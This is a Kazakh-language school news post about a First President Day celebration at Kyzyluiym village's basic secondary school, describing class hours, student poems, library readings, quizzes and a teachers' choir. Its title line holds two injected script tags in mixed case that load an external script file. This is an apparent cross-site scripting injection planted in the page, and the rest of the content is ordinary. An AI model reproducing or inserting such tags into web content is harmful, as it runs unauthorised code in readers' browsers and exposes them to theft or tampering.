Тұңғыш Президенті күні<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

06.12.2021

2021 жылдың 30 қарашасында Қызылұйым ауылының негізгі орта мектебінде   Қазақстан Республикасының Тұңғыш Президенті күні аталып өтті. Дайындық сыныбында, 1-9 сыныптарда  тәрбие сағаттары өткізіліп Елбасының тәуелсіздік жылдарындығы қажырлы еңбегі, жастық шағындағы өмір жолдары жайлы айтылып, бейнеролликтер көрсетілді.  Оқушылар Тұңғыш Президентке арналған тақпақтары мен өлеңдерін айтып берді. Мектеп кітапханашысы  Солтанбекова Н.А. 9-сынып оқушыларын кітапханадағы Елбасының кітаптарымен таныстырды.  Елбасымыз Нұрсұлтан Әбішұлы Назарбаевтың кітаптарына қысқаша тоқталып үзінділерін оқып берді.                         

          3- сыныпта Естаев Т.Т. «Тұңғыш Президент» және 9-сыныпта Клышбаев Р.Т. «Менің Президенттім» атты интеллектуалды жарыстар өткізді. Жарысқа оқушылар белсене қатысып, Президент туралы және Қазақстан Республикасының Тәуелсіздігі жайлы көп мәліметтермен танысты. Іс-шара соңында мектептің ұстаздар ұжымы хормен  Елбасының сөзіне жазылған «Елім менің» әнін орындады.

Просмотров: 748


Пікір қосу



Деректерді қолтаңбаға қосу